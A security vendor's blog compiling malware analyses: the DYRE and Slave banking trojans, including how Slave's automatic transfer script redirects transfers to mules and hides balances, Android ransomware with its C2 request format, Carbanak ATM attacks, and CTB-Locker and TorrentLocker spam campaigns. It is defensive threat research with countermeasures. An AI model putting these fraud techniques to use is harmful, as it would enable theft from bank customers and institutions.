Español | English
rss facebook linkedin Twitter

DYRE trojan targets Spain

Although just it has a few months old, the DYRE Trojan (aka Dyreza) is currently the busiest banking malware. Since early this year, the aggressive characteristics incorporated in the binary a fairly proactive gang has been added, working to increase its infrastructure  and monetization capacity. Progress has been noticed in two differents  fronts:

  • Expand the botnet geographical area:  The binary spread is done through spam campaigns with malicious attachments. At first these were limited to English-speaking countries, but have expanded their reach. 
  • Incorporation of new banks: DYRE configuration is done via the usual file that lists the banks where the Trojan must act. As has been expanding the area of influence of the botnet, the list of entities has also experienced an increase, as shown in the following chart

On this growing dynamic was just a matter of time that Spain, so far outside the campaign, entered the list. The latest version of the configuration file was distributed a few days ago; it can be seen as at least five Spanish banks and others in Colombia, Chile and Venezuela have been included for the first time.

  The countries currently targeted by criminals are reflected in this map (Click to see the animated GIF):

While its behavior is similar to well-known Zeus, DYRE presents some interesting approaches to the fraud process deserve to be analyzed in an upcoming post :)

S21sec eCrime

ATS: Slave´s best friend

A few days ago we commented in this blog the discovery of the Slave Trojan. A new malware differentiated by their webinjects in JSON format. In this post we will dissect the automatic transfer system (ATS) that works together with Slave , which is configured to target certain banks.
 The ATS injected by Slave is simple in its operation but very effective at the same time; in our research we were able to analyze the script code executed in the browser of the victim. This is designed in a modular way allowing adaptation to different "sites" of online banking in a quick and easily way. At the time of analysis, the ATS concerned three banks with different injects for each type of access (companies or individuals). New entities were also found, although they had not a presence at the Slave config, seemed to be ready for activation in the near future.

To identify the online banking page where the user is located, the script makes use of different techniques such as inspecting the current URL or search for specific items in the website´s DOM.
According to the website where the user is located, the scritp is able to perform different actions. The websites that have a code larger than 100 it corresponds to the longin forms, which depending on the bank may be 1 or 2 different matches. In these pages the script collects the user credentials and stores them in the sessionStorage browser. If the entity ask for more digits than for some digits of a second password, the script is able to recognize the requested digits and send the mask of that pass. However, for its operation the ATS does not need to steal credentials and the only action performed with them is send to the C & C, possibly for a manual review. This behavior allows to deduce that his priority is not to make the catch, but to modify transfers on real-time, as discussed below.

If user credentials are captured correctly, the script starts executing the following actions on the rest of the web:

  • Action 1 (landing page), it simply sends the user data and password to log. Depending on the bank, this action can be ignored. 
  • Action 2 (accounts info), looking for information on user accounts, extracts data and sends to the C & C in the following format:
               Owner Name * Account Number * Balance * - * |
  • Acción 3 (new transfer), It is responsible for changing the legitimate transfer for redirecting the money to a money mule instead of the original recipient. Before performing, various checks are done, including if the account has enough funds and a fraudulent transfer isn´t already made. If the victim passes these checks, a money mule is request to the C&C.

ATS´s answer to this request includes the new reciver of the transaction and the amount to send. With this information, the script falsifies the transfer, showing the data wich the user espects to see and sen the false data to the bank . ATS´s response to this request includes personal details from the new recipient of the transaction and the amount sent. With this information, the script tampers the transfer, showing the user the data expected to see (the transfer believed performed) and sending to the bank illegitimate.
On this way is the user who makes the verification steps. Either introducing card values coordinates, the PIN sent to the mobile or any other TAN factor.

Additionally, when illegitimate transfer has been made, the fixBalance?() function is executed at all sites where the account balance appears. This function changes the value of the balance displayed to hide the theft. This functionality of the Trojan is even sessions persistent, so while the user is infected fraudulent transfer and the actual balance will be completely undetectable on banking´s website.

Regarding the communication script - C&C, although it was not possible to replicate this process, a preliminary analysis showed the following conclusions:
  • To contact the C & C, the script uses JSONP, depending on the injection can load the jQuery library to make requests.
  • In all of them a field "key" that is hardcoded in the binary itself and necessary for communication is added.
  • Beyond this check and the SSL layer, communications script C&C do not appear to include any other kind of encryption or obfuscation.
Finally these are the MD5 identifying the samples analyzed:


New Ransomware in Mobile environment

It is widely known the new malware trend, which has caused several problems in the last year: the infamous Ransomware (Cryptowall, Cryptolocker and its derivatives). 

Although we have seen samples in the mobile environment (Koler), it was not common to find traditional spam with such malicious applications, until now. 

In a generic spam e-mail we received days ago included a suspicious attachment named “Check Updates.apk” probably pretending to be a Flash Player update.

At first glance the application is far from being a software update, just by reviewing the images and HTML documents embedded.

These documents, that are going to be presented to the victim as a part of the scam process, follow the common scheme, in this case the scam is as follows: The FBI has detected, through the PRISM platform, that the user has browsed forbidden web pages and must pay a fine.

The app installation is pretty simple and after open it a video player menu will be displayed. (That is obviously fraudulent)

After seconds, the disclaimer window will pop up, stitched to the screen, avoiding the end user to close it or use other apps.

This message, unlike Koler’s ones, always remains the same, no matter where the end user is located. Here are some screenshot taken during this step:

Once the mobile device is locked and the ransom requested, the next step is the purchase and charge (500$) of a PayPal MyCash card in order to provide the card number to the botmaster using the app panel as we can see on the image above.

The app is pretty simple in a technical point of view. Requiring a high amount of privileges and using the platform features as a normal app (it does not use exploits or require root privileges). These are the main features:

  • The ransom disclaimer window is generated as a system alert, shown over other applications or windows.
  • The crypto system used is AES, using the standard library. The key and salt used are always the same (PBKDF2WithHmacSHA1):
  • Although the cipher and uncipher code is complete, there is no evidence on the Labs test performed, that the app really ciphers the external drive storage (target: /sdcard/Android/).
  • The app uses a third party library named Volley for the connections management.
  • To fright the end user some personal information is shown like: browser bookmarks, end user’s photo (taken from the front camera) and geo location based on the device IP.
  • The main functionalities are:
  1. SMS and contacts delivery to malicious server
  2. Incoming SMS capture
  3. SMS delivery through the device
  4. Cipher/Uncipher external SD storage
  5. Device lock and unlock
  • SMS Spread: The malicious server sends an SMS template to the device in order to send an SMS with the APK URL to the whole contact list (this was also observed in recent Koler samples)

Control Panel

The Control Panel URL is hardcoded in the bot code. Once the URL is resolved, is periodically queried to get new commands (using HTTP and JSON answers)

GET /pha?android_version=4.1.2&id=xxxxxxxxxx&phone_number=xxxxxxxxx&client_version=1.03&imei=xxxxxxxxxxxxxxxx&name=sdk

During the bot register, a SMS template and Geo location will be also received, as explained before

{"sms_template": "OMG!!! Guess who's on a video here, you will not believe it!!!  hxxp://"}

{"city": "Madrid", "ip": "", "lon": yy.yyy, "lat": zz.zzz, "country_code": "ES", "country_name": "Spain"}

The server will also implement a backdoor access in order to control and query the bot.
This server contains a “app-download” website (similar to a third party market) which also serves the fake application.

Conclusion and Countermeasures 

The ransomware “boom” starts finding new distribution ways. Despite of being pretty simple apps, they get their objective of extorting the end user. Methods used are very social engineering oriented, but new functionalities are added constantly (SMS capture, spreading)

As a counter measure, it is recommended to keep the “install from untrusted sources” disabled and filter out emails with .apk attachments.

If the malicious application is already installed, we can proceed cleaning the machine by “adb unsintall” (it requires USB active debugging) or rebooting the system in safe mode in order to delete it later on.

New banking trojan 'Slave' hitting Polish Banks

We have spotted a new banking trojan in the wild that uses JSON formatted webinjects. After that so many Zeus-like webinjects around, this was kind of refreshing. Currently this banker only have targets in Poland. We are analyzing injects, as they are capable of using ATS.

The malware has a time check which prevents it from running after 1 of April 2015. Don't get fooled, the botmaster probably would issue an update command before that could happen, but this can render useless already "captured" samples that are circulating on the internet between researchers.

There are indications that the author used chromium source code to build the malware, hence we dubbed it "Slave":

One of the original filenames was Faktura V_388_02_20_2015.doc.scr, which pretty much sounds like if it was distributed via spam.

Some hashes:

If possible, we will show how ATS is working for this injection in an update.

For further info, please contact us: blog [at]

S21sec Ecrime


On October 2014, an investigation from the international police organization Interpol alerted of a new type of banking malware, called Tyupkin, that allowed criminals to gain full control of ATM machines, allowing them to steal huge amounts of money in cash without having to use a credit or debit card (see our blog post).

Far from being an isolated case, recent events show a boost on ATM targeted malware attacks, with a variety of attack vectors all sharing a common target, stealing huge amounts of cash directly from the bank, leaving their customers apart.

The hottest topic to date is the Carbanak APT (also known as Anunak), a sophisticated cyberattack affecting financial institutions in more than 30 countries with cumulative losses of up to 1 billion USD.

The attack vector consisted in compromising the victim’s network, by means of spear phishing emails that downloaded the malicious code which was later propagated to critical systems.

Having infected key users, attackers spied them to get detailed knowledge of internal working tools and procedures, to enable them to mimic their activities to perform fraudulent actions while remaining unnoticed by the bank’s fraud detection systems.

Although the criminals pursued multiple routes, one of the relevant targets was the control of the Automated Teller Machines (ATM) network.

ATM Network Control with Carbanak

Once the Carbanak APT successfully compromised the victim´s network, the attackers managed to gain access to the ATM management infrastructure and infect those systems with their own malicious software.

Although there might be more attack techniques not yet discovered, evidences of the following ATM targeted malware attacks have been found:
  1. Change Denomination of Withdrawal Banknotes
  2. The ATM was manipulated to modify the banknote denominations, allowing mules to withdraw more money than actually registered in the transaction.
    The attackers uploaded malicious scripts and modified the ATM operating system registry to change denominations of issued banknotes. As a result, a transaction for 10 notes with denomination of 100 roubles gave the attackers 10 notes with denomination of 5,000 roubles.

  1. Remote Withdrawal of Cash from Dispenser
The ATM network was used to dispense cash from certain ATMs at certain times where money mules were ready to collect it.

The attackers used a modified debug program that accepts commands to issue money from the dispenser. The original program only works when the ATM door is opened, but the tampered one ignored it.

The criminals were able to control computers that had access to the internal ATM network, using them to remotely issue cash withdrawal commands.

Based on these evidences we can say that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers. APTs are not only for stealing information anymore.

ATM Targeted Malware vs Lack of Security Measures

Malware attacks are one of the biggest concerns in ATM fraud since they are far less risky and much more profitable than traditional skimming or physical attacks.

The criminals are extremely agile and innovative in producing new types of malware to launch direct APT-like attacks against banks, but they are also helped by the very poor security of ATMs, still running old-fashioned Microsoft systems, and the weaknesses in the ATM infrastructure.

Every ATM is exposed to malware attacks and therefore applying strong security countermeasures is a must. An integrated security solution based on Application Whitelisting, Full Disk Encryption, HW Protection and File Protection, provides the most advanced and most effective countermeasure capability to stop this new generation of attacks.

In the case of the above mentioned attacks, Application Whitelisting would have avoided to run the script to change the banknote denominations, while File Protection would have prevented the attackers from replacing the ATM debug program binary.

S21sec Approach to ATM  Security

S21sec has extensive expertise in the development of solutions adapted to the needs of the banking industry. Its product Lookwise Device Manager helps to protect ATM networks from logical attacks by restricting its usage to only authorized hardware or processes, monitoring ATM activity, and allowing to execute remote actions.

S21sec also provides specialized and advanced security services for financial organizations.
We are members of ATMIA and ATEFI industry associations.


Juan Ramón Aramendía 
Lookwise Product Marketing Manager

Bulk spam campaign for Dalexis+CTB-Locker


In the last few days a bulk spam campaign has been detected distributing Dalexis malware downloader. Below this lines you will find a screenshot taken from one of the spam mails. 

Email attached files are compressed files with the extensions .zip or .cab. Whithin them there is a .scr file which once executed will display one of the following documents:

  • Document 1

  • Document 2

  • Document 3

This downloader is linked to the CTB-Locker ransomware. This crypto-malware ciphers files based on their extension, including: pdf, xls, ppt, txt, py, wb2, jpg, odb, dbf, md, js, pl, It is able to cipher files located both in local and mapped drives.

Once file ciphering is completed the following ransom message is shown:

The message will be localised depending on victim's location. Available languages are: Frech, English, Italian, German y Dutch. Cybercriminals include additional information to guide victim through the steps needed to pay the ransom.

Ransomware download is performed through a TOR request using getway attempting to avoid AV tools and proxies. Furthermore, the downloaded file is also ciphered and is deciphered by the downloader in order to run it.

Until now we have seen the following URLs within Dalexis samples:

•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://
•    hxxp[s]://

File recovery

CTB-Locker uses a custom elliptic curve ciphering based algorithm which warranties that files would be irrecoverable without the proper key.


As usual, prevention is the best countermeasure. Avoid opening unsolicited e-mail attached files and implement a proper  privilege policy for network shares.

In addition, you can mitigate the problem by blocking Dalexis URLs thus avoiding CTB-Locker download. S21sec's Automatic Malware Analysis Platform analyzes tens of thousands of samples daily. Information gathered from analyzed samples is feed into Lookwise Threat Intelligence solution which can be used for companies internal network threat detection.

TorrentLocker Campaign affecting Spain and Italy

Recently S21sec detected a very active ransomware campaign focused in Spain and Italy.  The malware of choice this time has been TorrentLocker,  and the means to trick the user into install the malware are a series of spam mails with a link to the malware.

Ransomware is a kind of threat that either blocks the desktop or encrypts the information contained in an infected device. In both cases the criminals demand a payment to restore the system,  usually for the payout the victim is required to purchase Bitcoins, Ukash tickets or any other non traceable currency.

During the last two years we have seen several threats sharing a similar approach on desktop computers but also they target mobile devices. Some examples are: CryptoLocker, Reventon, Netra, CryptoWall, Decode@india, TorLocker, Urausy…


TorrentLocker affects Microsoft Windows systems it is reminiscent, although only in appearance, of the infamous CryptoLocker. But when  the implementations are compared  substancial differences arose.

The main resemblance comes from the appropriation of the CrytoLocker name in the ransom note. This may be done to boost the blackmail intimidation effect with the name of a better known threat, also could be an attempt to hide several weakness on the earlier versions.


This ransomware encrypts all files belonging to any the following extensions stored in every mapped drive unit. This means that TorrentLocker will not encrypt the network shared folders unless they are mounted as a local drive, this applies as well to the recovery partitions.

After a successful infection TrorrentLocker tries to establish a TLS session with its C&C server, which in opposition to CryptoLocker that employed a DGA it is hardcoded in the binary, in order to obtain encryption key. If the communication with the C&C panel can not be performed no encryption will be performed at all.

Currently two versions of the malware have been reported, the main change among them lies in the encryption algorithm being used.

Early versions 

The first news of TorrentLocker original version date back to August 2014, when another spam campaign  impersonating the National Postal Service hit Australia.

This early version used a rudimental encryption routine that consist in applying a static XOR mask to the first 2 MB of the file (smaller than 2MB files would be fully encrypted). So if the victims had an unencrypted copy of a file bigger than 2 MB it was possible to retrieve the XOR key and restore the files using the following tool.

In our opinion,  maybe is due to this weak algorithm that the criminals choose to disguise themselves as CryptoLocker due to the dreadful reputation of the former trojan.

AES TorrentLocker

Is during the early December of 2014 when a new variant of the malware outbreaks. The new strain uses the AES (Advanced Encryption Standard), this change make more difficult to retrieve the files.

It is still possible to retrieve the files if just after the infection a file carving tool is used, Due to TorrentLocker does not deletes the files in a secure manner after encryption.

For a more in depth analysis you should consider to read the original work on the malware done by iSHIGHT Partners.


The initial reports about the spam campaign we are analyzing in this post reach us during the first two days of December. It was active until December 5th at 20:09 (GMT+1) when the C&C servers went dark and stop to show any activity.

Spam mails

Through the course of the campaign several mail templates were employed in order to trick the users to download the attached .zip files. We have identified that at least three different templates were used.

  • Mail 1 

  • Mail 2
  • Mail 3

The links served .zip files that once unzipped shown the following names:

  • Informe.Pdf_____________________________________________________________.exe
  • Perfil.Pdf _____________________________________________________________.exe
  • Processing.Pdf_____________________________________________________________.exe
  • Mensaje.pdf_____________________________________________________________.exe

Again a low tech but yet effective approach is taken in order to hide the file extension.


Is easy to spot that over 80% of the affected users are in Spain and Italy with little affectation in other countries. As a side an funny fact we found one affected computer in the Vatican State.

Additionally we have detected TorrentLocker campaigns targeting Turkey and Australia after the conclusion of the Spanish/Italian operation.


Due to its easy monetization and the relatively simple support infrastructure needed we are seeing a rising in the number of infections caused by some variety of ransomware.

In this cases prevention is the best defense for the user cause as we have seen recover the files can be extremely difficult once they have been cyphered. In corporative networks is important to control the access  and privilege level of shared resources such network accesible drives in order to confine the damages to just the infected device.

(+34 902 222 521)

24 hours a day, 7 days a week

© Copyright S21sec 2013 - All rights reserved